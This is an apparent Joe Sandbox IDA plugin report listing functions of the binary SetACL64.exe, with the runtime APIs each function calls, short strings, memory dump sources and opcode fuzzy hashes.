Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$e+000$gfff
API String ID: 3215553584-2620144452
Opcode ID: b957d2cc3425ec91ce08f74e2f63db020459ef895d73246136ae502abcf24435
Instruction ID: 87364742c6066b964736586d50243e8fafd6f1fccf2c3da834ce9eb2e8765f2e
Opcode Fuzzy Hash: b957d2cc3425ec91ce08f74e2f63db020459ef895d73246136ae502abcf24435
Instruction Fuzzy Hash: AF510CA2B187C186EB258F39984136D7BA1FF41B90F489239D7AC87BD5DE2ED844C710

Function 00007FF68683D0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF68683D0CB
LeaveCriticalSection.KERNEL32 ref: 00007FF68683D1AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683D1CC

Part of subcall function 00007FF686834FC0: GetModuleFileNameW.KERNEL32 ref: 00007FF68683503A

Strings

.log, xrefs: 00007FF68683D117

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalSection$EnterFileLeaveModuleName_invalid_parameter_noinfo_noreturn
String ID: .log
API String ID: 3890993197-299349702
Opcode ID: d1984f5f7160b112c225d9afbce00dc298177562a86290b7b952876b9305a88a
Instruction ID: 286d4c6dc4fc32a1175cae0b051a81f96514fd8ec26e54fb25136e2d9fa8eba1
Opcode Fuzzy Hash: d1984f5f7160b112c225d9afbce00dc298177562a86290b7b952876b9305a88a
Instruction Fuzzy Hash: BE21D4F1A18642D2EA109B14E94527DA361FF857E0F801639EA6D876E9DF3EEC40CB10

Function 00007FF68685B1AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68685AA60: SysAllocString.OLEAUT32 ref: 00007FF68685AAAF
Part of subcall function 00007FF68685AA60: SysAllocString.OLEAUT32 ref: 00007FF68685AAFD
Part of subcall function 00007FF68685AA60: SysFreeString.OLEAUT32 ref: 00007FF68685AD13
Part of subcall function 00007FF68685AA60: SysFreeString.OLEAUT32 ref: 00007FF68685AD50

CoUninitialize.OLE32 ref: 00007FF68685B1D6

Strings

Jo, xrefs: 00007FF68685B231

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: String$AllocFree$Uninitialize
String ID: Jo
API String ID: 3194604352-866799578
Opcode ID: fb526238290185d568cb8d2a9593fae541931b6e55344edac3bb91d1d3bb4913
Instruction ID: aa5320dd3d3cbce4da24ead5ed755035c512155de2b34b93a95f83f627513988
Opcode Fuzzy Hash: fb526238290185d568cb8d2a9593fae541931b6e55344edac3bb91d1d3bb4913
Instruction Fuzzy Hash: 281191A2B19646C5FA009B25D19937E2362FF44B84F400439CB0D876A2DF3EEC90C324

Function 00007FF686860A30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

MapGenericMask.ADVAPI32 ref: 00007FF686860A96
MapGenericMask.ADVAPI32 ref: 00007FF686860AC1

Strings

?, xrefs: 00007FF686860A7F
9, xrefs: 00007FF686860A77

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: GenericMask
String ID: 9$?
API String ID: 3675760450-2473970582
Opcode ID: 4c0f5baecf9d6be22cf31ba991dbf6aa8ff0cb5a87ad2c359d2a511522842ea8
Instruction ID: 5785376efe878dacb5aa4221c11383a7a21655239f9133f165958c1ec066cda9
Opcode Fuzzy Hash: 4c0f5baecf9d6be22cf31ba991dbf6aa8ff0cb5a87ad2c359d2a511522842ea8
Instruction Fuzzy Hash: 73114FB2A1C645CBE7219F04F59512A77A1FBC8748F800129F78D46A19DF3ED545CF00

Function 00007FF6868326D0 Relevance: 6.2, APIs: 4, Instructions: 173COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868327A0
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6868327A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686832944
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683294A

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID:
API String ID: 3936042273-0
Opcode ID: 4c107eee0b4e4811bc64223c6d6b2de02e59749188d4f6f301365c20f6b63f69
Instruction ID: 8d68e9bc892df8ac60e434c35eafee33242aa66fec38608032faab405601f751
Opcode Fuzzy Hash: 4c107eee0b4e4811bc64223c6d6b2de02e59749188d4f6f301365c20f6b63f69
Instruction Fuzzy Hash: 8071BDA2B19B41C9EB009F25D5553AC2361FF48B98F408635DB6C837DAEF39E990C350

Function 00007FF686883EF8 Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF686883F39
_invalid_parameter_noinfo.LIBCMT ref: 00007FF686883FB9
_invalid_parameter_noinfo.LIBCMT ref: 00007FF68688400D
_get_daylight.LIBCMT ref: 00007FF686884065

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_get_daylight
String ID:
API String ID: 72036449-0
Opcode ID: c4ae961d942addcf2b134008d439d8ef08f12080ebcb94819dad5dfadd3a20b1
Instruction ID: cccc2d220bea4902b49516e5ccbee957c6dc35f7c61e75383f516ab81aebaa12
Opcode Fuzzy Hash: c4ae961d942addcf2b134008d439d8ef08f12080ebcb94819dad5dfadd3a20b1
Instruction Fuzzy Hash: CE51D0B3E8C213C3F7A54A69950437A6590BF64754F19403DDA0DCA2E6DE6FEC40C6B2

Function 00007FF68688AAE0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF68688AB48
CloseHandle.KERNEL32 ref: 00007FF68688AB55
CloseHandle.KERNEL32 ref: 00007FF68688AB62
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68688ABC7

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CloseHandle$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2401491561-0
Opcode ID: 1486c1b8983b2ca0bcc84f6bab691d8d42c10c3cc9c104c01906a72530798f0a
Instruction ID: 08d49e2df2e3f0a2c29f6a9a10385b7aaa919bec27922b461d78c4d7d6ecb55b
Opcode Fuzzy Hash: 1486c1b8983b2ca0bcc84f6bab691d8d42c10c3cc9c104c01906a72530798f0a
Instruction Fuzzy Hash: 623176E1A59A4AC2FE048B19E8592382312BFC4B95F444939CE4D977F5DF2EEC80C321

Function 00007FF68683EA60 Relevance: 6.0, APIs: 4, Instructions: 34synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF68683EA79
ResetEvent.KERNEL32 ref: 00007FF68683EABC
ReleaseMutex.KERNEL32 ref: 00007FF68683EAC6
SetEvent.KERNEL32 ref: 00007FF68683EAD0

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Event$MutexObjectReleaseResetSingleWait
String ID:
API String ID: 2375943032-0
Opcode ID: 7b46ffe4c5099b2b667e965cb1ff3ada34845c803c41c1e8d10894002ef2c070
Instruction ID: 27fbe6e02a85d991a3a5b05acd43d6c10f85e549e305bb4016438618cf62c597
Opcode Fuzzy Hash: 7b46ffe4c5099b2b667e965cb1ff3ada34845c803c41c1e8d10894002ef2c070
Instruction Fuzzy Hash: 0901D372605A85C6EB448F21E89432973A4FFD8F98F148139CA5D8B3A4DF39D895C350

Function 00007FF686821710 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

-log, xrefs: 00007FF686821850

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID:
String ID: -log
API String ID: 0-56760616
Opcode ID: 1eecdd57994f2533d2a3b202c9ec56c7c722615268746318ca363c07f4b769d4
Instruction ID: b10bbbe4a3c30ac3362eebb641878a329d7734dcc2c009e31e625a2694d3ff5d
Opcode Fuzzy Hash: 1eecdd57994f2533d2a3b202c9ec56c7c722615268746318ca363c07f4b769d4
Instruction Fuzzy Hash: D1918BA2B05A41D9EB04CBA5D0402AC23B1FF48B98F90413ADF5D97B98EE3AE855C350

Function 00007FF686866EA8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF686866ED2

Strings

csm, xrefs: 00007FF686866EF7
csm, xrefs: 00007FF686867066

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 140bdb4f9088bb5670319dceb203d8db25e3c3c3cfd3d3b344dc43606597f418
Instruction ID: 03b7e931ce37f77c21c16ca5474bfc5bdad4b3c3090f90bcdad293da0b43d54b
Opcode Fuzzy Hash: 140bdb4f9088bb5670319dceb203d8db25e3c3c3cfd3d3b344dc43606597f418
Instruction Fuzzy Hash: 7571A0B2A18681C6DB208B25D4587797BA1FF04F98F04813ADF4D87A85DE2ED891C7A1

Function 00007FF6868664E4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF686866530

Strings

MOC, xrefs: 00007FF686866544
RCC, xrefs: 00007FF68686654D

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 2b0c2825179cba656fd1c1b471b4941425bc7ec70a51c4e696d4729a40678a82
Instruction ID: 6622aa697c78868c016a174783b3e72fdd57741daf28997e75b0ac04d2d585f3
Opcode Fuzzy Hash: 2b0c2825179cba656fd1c1b471b4941425bc7ec70a51c4e696d4729a40678a82
Instruction Fuzzy Hash: DB518CB2A18A85CAEB10CF65E0447AD77A0FB44B8CF040129EF4E97B59CF79E885C711

Function 00007FF68685B313 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

?\UNC\, xrefs: 00007FF68685B48A
\\?, xrefs: 00007FF68685B342

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID:
String ID: ?\UNC\$\\?
API String ID: 0-2035776247
Opcode ID: a4f302d2082b19bd39a44b1874956c81c3294110edb74e814a97884128a82e9b
Instruction ID: 963376fa87eece7bbca4b7ca45457826e183469344a4a399e746a966070470a6
Opcode Fuzzy Hash: a4f302d2082b19bd39a44b1874956c81c3294110edb74e814a97884128a82e9b
Instruction Fuzzy Hash: 7341B3A2F18656C6FE149F61C0683FD2362FF24798F80013ADA5E977D5DE2E9980C364

Function 00007FF686833F80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834104
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68683410A

Strings

tss, xrefs: 00007FF686833F98

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: tss
API String ID: 73155330-1638339373
Opcode ID: 7b158194c5e526a4a18f9fad0e2b90092b2974379bf3b45cd8f3baac7b0ba31a
Instruction ID: 94174e2e4901ad88a0d017064c5fcae7c4ea7724da16939e5c61bafd194ee3a2
Opcode Fuzzy Hash: 7b158194c5e526a4a18f9fad0e2b90092b2974379bf3b45cd8f3baac7b0ba31a
Instruction Fuzzy Hash: D441EFA2B19A82C6EA04DB12965417D2260FF54BE0F580639DB2D87BD5DF7EE891C320

Function 00007FF68686747C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF686867526
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF686867552

Strings

csm, xrefs: 00007FF686867652

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: bff377e20215f6bbc56ca34a453ae38d57878f3cd995b74642c36c42e48d33ca
Instruction ID: ec1dfed0ba654f773ce06889592c95e2821d89ae63eb6b50d8fed0f16756dbe2
Opcode Fuzzy Hash: bff377e20215f6bbc56ca34a453ae38d57878f3cd995b74642c36c42e48d33ca
Instruction Fuzzy Hash: C2518EB2628741C7E661EF15E14426E77A4FB88B94F100138EB8D87B55DF3EE860CB61

Function 00007FF68687294C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68687297E

Part of subcall function 00007FF686875054: HeapFree.KERNEL32(?,?,00007FF6868734C7,00007FF686874ADC,?,?,?,00007FF686874E5F,?,?,0000F23FCA72FB90,00007FF686875874,?,?,?,00007FF6868757A7), ref: 00007FF68687506A
Part of subcall function 00007FF686875054: GetLastError.KERNEL32(?,?,00007FF6868734C7,00007FF686874ADC,?,?,?,00007FF686874E5F,?,?,0000F23FCA72FB90,00007FF686875874,?,?,?,00007FF6868757A7), ref: 00007FF68687507C

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF68686226D), ref: 00007FF68687299C

Strings

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe, xrefs: 00007FF68687298A

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
API String ID: 3580290477-1081327875
Opcode ID: aa599a36ba6a0968a49bd794e7a1571458fa8a1e1b45d82a3122116992cc5e68
Instruction ID: cb93066af07acc480890487f2fd02d3b0337f205547dfb4e1d21bf9540769f9e
Opcode Fuzzy Hash: aa599a36ba6a0968a49bd794e7a1571458fa8a1e1b45d82a3122116992cc5e68
Instruction Fuzzy Hash: 41416AB2B08B12C6EB15EF25A8911BC66A5BF44794F544039EA4E87B95DF3EE841C320

Function 00007FF68687E6E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF68687E7F7
GetLastError.KERNEL32 ref: 00007FF68687E819

Strings

U, xrefs: 00007FF68687E7A3

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: d59aa33b38612ae6739f83d51169c656099beb2d3f667978864e56d4317c1a25
Instruction ID: be0f0e3c752545e407cff98b5d5036d92789129bb31d9a3d23b06db1f2f08686
Opcode Fuzzy Hash: d59aa33b38612ae6739f83d51169c656099beb2d3f667978864e56d4317c1a25
Instruction Fuzzy Hash: 5541B162B28A45C6EB208F65F4483A967A1FB987C4F444039EE4DC7798EF7DD841C750

Function 00007FF68687BED4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_handle_errorf.LIBCMT ref: 00007FF68687C046

Strings

", xrefs: 00007FF68687BFF1
powf, xrefs: 00007FF68687C03F

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _handle_errorf
String ID: "$powf
API String ID: 2315412904-603753351
Opcode ID: 4c8a7104b5368009bc02c85030aff32139670d494d3475396f94041b1bf7d79b
Instruction ID: 4ebfa0df4c46d01f5ecd67c7c0abf9958f84d8037a1ac03cfb70c7f1fa20e618
Opcode Fuzzy Hash: 4c8a7104b5368009bc02c85030aff32139670d494d3475396f94041b1bf7d79b
Instruction Fuzzy Hash: 45411FB3928680DED370CF22E4847AAB6A0FB99348F101329F749429A8CF7DD955DB54

Function 00007FF68685E1C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68687DE6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF68687DE8E

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685E2EA

Strings

wt, ccs=UNICODE, xrefs: 00007FF68685E22D
rt, ccs=UNICODE, xrefs: 00007FF68685E236

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_invalid_parameter_noinfo_noreturn
String ID: rt, ccs=UNICODE$wt, ccs=UNICODE
API String ID: 1705651295-2937027470
Opcode ID: 935450736d1db829583b36a6614573cb82d4dc60051ad41040f15e431cbeb578
Instruction ID: 23e0e62f27e4a9e067a5a4a47cd3369cba0313a975cbd9868a7ecd8eb31dc154
Opcode Fuzzy Hash: 935450736d1db829583b36a6614573cb82d4dc60051ad41040f15e431cbeb578
Instruction Fuzzy Hash: 0D3172B2A18B42C2EA10DB18F89D22D6261FF88784F500139E69E87699DF3EED50C750

Function 00007FF68687BDB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF68687BEC2

Strings

", xrefs: 00007FF68687BE9B
pow, xrefs: 00007FF68687BEB1

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

